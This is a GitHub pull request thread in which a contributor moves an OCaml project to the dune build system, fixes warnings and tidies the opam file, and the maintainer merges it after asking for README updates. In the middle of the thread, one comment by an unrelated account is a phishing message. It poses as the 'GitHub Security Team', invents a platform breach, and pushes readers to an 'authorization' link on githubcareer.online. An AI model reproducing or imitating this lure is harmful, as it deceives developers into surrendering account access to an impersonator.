### PR TITLE
switch to dune, fix new warnings, improved opam file

### PR DESCRIPTION
**Pull request by redianthus**
Hi,

I switched the project to dune, fixed some new warnings (missing label application), added a few fields to the opam file and made sure it passes `opam lint`.

### CODE REVIEW

**Comment by ayberkt** [comment]
Hi @zapashcanon 

> I switched the project to dune, fixed some new warnings (missing label application), added a few fields to the opam file and made sure it passes `opam lint`.

That's great to hear; many thanks! I will take a look at it and merge the PR tomorrow.

**Comment by ayberkt** [comment]
@zapashcanon Sorry, I haven't gotten around to reviewing this yet. I hope to take a look today.

**Comment by jimga150** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team

**Comment by redianthus** [comment]
ping @ayberkt :)

**Comment by ayberkt** [comment]
Hi @zapashcanon, sorry I realized I had completely forgotten about this.

Could you please update the README with the instructions to use `dune` as well?

**Comment by redianthus** [comment]
Thanks! See #8 for updated instructions.

**Pull request merged**
